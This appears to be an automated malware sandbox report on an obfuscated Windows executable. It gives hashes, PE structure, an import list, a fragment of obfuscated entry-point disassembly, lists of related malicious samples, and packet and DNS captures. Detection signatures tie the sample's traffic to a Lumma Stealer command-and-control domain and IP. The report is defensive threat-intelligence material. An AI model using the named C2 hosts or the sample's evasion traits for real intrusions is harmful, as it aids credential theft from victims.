                                                                            jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 104.21.4.208
                                                                            74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 104.21.76.57
                                                                            SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                            • 172.67.215.45
                                                                            Receipt_7814002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.13.205
                                                                            Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                                                            • 104.26.15.182
                                                                            VN24A02765.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 104.26.13.205
                                                                            ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                            • 172.67.74.152
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1hta.htaGet hashmaliciousUnknownBrowse
                                                                            • 172.67.177.98
                                                                            2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                            • 172.67.177.98
                                                                            RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.177.98
                                                                            SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.177.98
                                                                            SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.177.98
                                                                            FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.177.98
                                                                            z47Danfe-Pedido17042024.msiGet hashmaliciousMicroClipBrowse
                                                                            • 172.67.177.98
                                                                            SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                            • 172.67.177.98
                                                                            Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                            • 172.67.177.98
                                                                            s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 172.67.177.98
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.9555626953806176
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:5'747'200 bytes
                                                                            MD5:0b4ad1c3b3f364c3d79fabdb47fe3385
                                                                            SHA1:85de5462d6342f03eaf3fb48176615fa6fa18508
                                                                            SHA256:21f247c6c84b114525d41500d54a63ab4bcea96d14ba8ca13be445acd72a081d
                                                                            SHA512:c9f6ecb99786613113ae5e02bf9e4a00fcf7036a1bddd07c87f8cb66ce8f45b9515d4fc0321cbf20282556f16645818249d04390335f518afdc1d2253f8dab76
                                                                            SSDEEP:98304:ao3n7Qvg+PVALF8Ka+EQLkVBbrxkKmrMP2tOmzprZOCgNYWxMuxee4F6OzU7+bgb:aY84EALF8Ka+EUakLrMP2tDrQCg6Wxj5
                                                                            TLSH:1B46236323260545E6D68C3686277EEE31F3036A8783BC7D69E33DC634225E9B225D53
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....8#f..............................O...........@..........................`............@........................................
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x8f9bfe
                                                                            Entrypoint Section:.vmp1
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x662338B6 [Sat Apr 20 03:38:30 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:d435064ba91569f26a23505d954231af
                                                                            Instruction
                                                                            push A409FB29h
                                                                            call 00007F6984EC4D55h
                                                                            rol eax, 1
                                                                            xor eax, 0EAA540Ch
                                                                            cmc
                                                                            neg eax
                                                                            cmc
                                                                            sub eax, 48243F84h
                                                                            xor ebx, eax
                                                                            cmc
                                                                            jmp 00007F6984E052ABh
                                                                            not edx
                                                                            bswap edx
                                                                            jmp 00007F6984EEBA30h
                                                                            test ebp, edi
                                                                            not eax
                                                                            jmp 00007F6984F80BE8h
                                                                            dec ecx
                                                                            stc
                                                                            ror ecx, 1
                                                                            cmc
                                                                            test dl, ah
                                                                            neg ecx
                                                                            add ecx, 0F1845A9h
                                                                            jmp 00007F6984E74348h
                                                                            mov ax, word ptr [ebp+00h]
                                                                            mov cl, byte ptr [ebp+02h]
                                                                            cmc
                                                                            sub ebp, 00000002h
                                                                            stc
                                                                            test edi, ebx
                                                                            jmp 00007F6984EFD649h
                                                                            push esi
                                                                            ret
                                                                            not edx
                                                                            jmp 00007F6984F9ECB1h
                                                                            jmp 00007F6984ED6E13h
                                                                            push A8F035E8h
                                                                            call 00007F6985341C9Ch
                                                                            bswap eax
                                                                            jmp 00007F6984E1BE69h
                                                                            not eax
                                                                            cmc
                                                                            ror eax, 1
                                                                            jmp 00007F6984E21D18h
                                                                            jmp 00007F6984EE7921h
                                                                            rep stosw
                                                                            test ah, al
                                                                            mov ecx, dword ptr [ebp+08h]
                                                                            movzx ax, ch
                                                                            dec eax
                                                                            lea eax, dword ptr [ecx-01h]
                                                                            mov dword ptr [ebp-40h], eax
                                                                            xor esi, esi
                                                                            test dx, bp
                                                                            or eax, FFFFFFFFh
                                                                            sub edi, edi
                                                                            test ch, FFFFFFF9h
                                                                            jmp 00007F6985021E0Ch
                                                                            inc eax
                                                                            cmp ch, 00000054h
                                                                            xor ebx, eax
                                                                            cmp ch, FFFFFF8Bh
                                                                            add edi, eax
                                                                            push edi
                                                                            ret
                                                                            dec edx
                                                                            clc
                                                                            test cl, 0000007Ah
                                                                            xor ebx, edx
                                                                            test cl, 00000000h
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8ebf940xdc.vmp1
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8f50000x5bc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x5b50000x80.vmp1
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x391050x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x3b0000x28fb0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x3e0000xa5340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .vmp00x490000x3301410x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .vmp10x37a0000x57a7c00x57a800333653f67ef3ae4a0da443bd2daf79efunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .reloc0x8f50000x5bc0x60068a79c1c12512e8647f2e507d94281b6False0.529296875data4.224219147614464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            DLLImport
                                                                            KERNEL32.dllExitProcess
                                                                            OLEAUT32.dllSysAllocString
                                                                            ole32.dllCoCreateInstance
                                                                            USER32.dllCloseClipboard
                                                                            GDI32.dllBitBlt
                                                                            WTSAPI32.dllWTSSendMessageW
                                                                            KERNEL32.dllVirtualQuery
                                                                            USER32.dllGetProcessWindowStation
                                                                            KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                                                                            USER32.dllGetProcessWindowStation, GetUserObjectInformationW
                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/20/24-19:20:56.333314UDP2052028ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (greetclassifytalk .shop)5233253192.168.2.41.1.1.1
                                                                            04/20/24-19:21:01.309164TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49735443192.168.2.4172.67.177.98
                                                                            04/20/24-19:20:56.483623TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49730443192.168.2.4172.67.177.98
                                                                            04/20/24-19:20:57.310065TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49731443192.168.2.4172.67.177.98
                                                                            04/20/24-19:21:00.168650TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49734443192.168.2.4172.67.177.98
                                                                            04/20/24-19:20:58.261554TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49732443192.168.2.4172.67.177.98
                                                                            04/20/24-19:21:03.516500TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49737443192.168.2.4172.67.177.98
                                                                            04/20/24-19:20:59.171078TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49733443192.168.2.4172.67.177.98
                                                                            04/20/24-19:21:02.107071TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49736443192.168.2.4172.67.177.98
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 20, 2024 19:20:56.479856968 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.479935884 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:56.480057001 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.483623028 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.483681917 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:56.717701912 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:56.717951059 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.720880032 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.720931053 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:56.721486092 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:56.775702953 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.810002089 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.810003042 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:56.810437918 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.291860104 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.291970968 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.292073965 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.295871973 CEST49730443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.295917034 CEST44349730172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.309381008 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.309461117 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.309704065 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.310065031 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.310139894 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.529468060 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.529721022 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.530826092 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.530849934 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.531349897 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:57.532526970 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.532557011 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:57.532660007 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093123913 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093348026 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093429089 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093511105 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093571901 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.093573093 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.093590975 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093663931 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093724966 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.093740940 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093827963 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093904972 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.093982935 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.094048023 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.094048023 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.094068050 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.094095945 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.094146013 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.094228029 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.094358921 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.094556093 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.094556093 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.094556093 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.260979891 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.261065960 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.261156082 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.261554003 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.261579990 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.400762081 CEST49731443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.400823116 CEST44349731172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.487245083 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.487328053 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.489479065 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.489490032 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.490022898 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.491862059 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.492017031 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.492054939 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:58.492140055 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:58.492146969 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.060959101 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.061259031 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.061336994 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.064482927 CEST49732443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.064505100 CEST44349732172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.170698881 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.170732021 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.170790911 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.171077967 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.171092033 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.397903919 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.398010015 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.399862051 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.399876118 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.400398970 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.401578903 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.401696920 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.401757002 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.929457903 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.929727077 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:20:59.929835081 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.929861069 CEST49733443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:20:59.929883957 CEST44349733172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.168056011 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.168112993 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.168220997 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.168649912 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.168662071 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.397979021 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.398078918 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.399665117 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.399688005 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.400201082 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.401731968 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.401942968 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.401978016 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.402059078 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.402075052 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.983414888 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.983673096 CEST44349734172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:00.983675957 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:00.983753920 CEST49734443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.308715105 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.308764935 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:01.308875084 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.309164047 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.309176922 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:01.531259060 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:01.531353951 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.532850027 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.532865047 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:01.533389091 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:01.537728071 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.538269043 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:01.538327932 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.052558899 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.052826881 CEST44349735172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.052864075 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.052932978 CEST49735443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.106456041 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.106535912 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.106934071 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.107070923 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.107105017 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.331387997 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.331621885 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.333353996 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.333405018 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.333977938 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.335058928 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.335154057 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.335253000 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.856508970 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.856791973 CEST44349736172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:02.856911898 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:02.856913090 CEST49736443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.515516996 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.515624046 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.515741110 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.516499996 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.516575098 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.736799955 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.737082958 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.738657951 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.738709927 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.739063978 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.740623951 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742044926 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742093086 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.742239952 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742280960 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.742419958 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742463112 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.742633104 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742671013 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.742863894 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.742924929 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.743155956 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.743210077 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.743228912 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.743439913 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.743494987 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.784169912 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.784579992 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.784672022 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.784697056 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.832130909 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.832354069 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.832413912 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.832453966 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.880212069 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:03.880431890 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:03.928129911 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:04.057712078 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:05.320393085 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:05.320668936 CEST44349737172.67.177.98192.168.2.4
                                                                            Apr 20, 2024 19:21:05.320980072 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:05.321064949 CEST49737443192.168.2.4172.67.177.98
                                                                            Apr 20, 2024 19:21:05.321101904 CEST44349737172.67.177.98192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 20, 2024 19:20:56.333313942 CEST5233253192.168.2.41.1.1.1
                                                                            Apr 20, 2024 19:20:56.473897934 CEST53523321.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Apr 20, 2024 19:20:56.333313942 CEST192.168.2.41.1.1.10x4a42Standard query (0)greetclassifytalk.shopA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
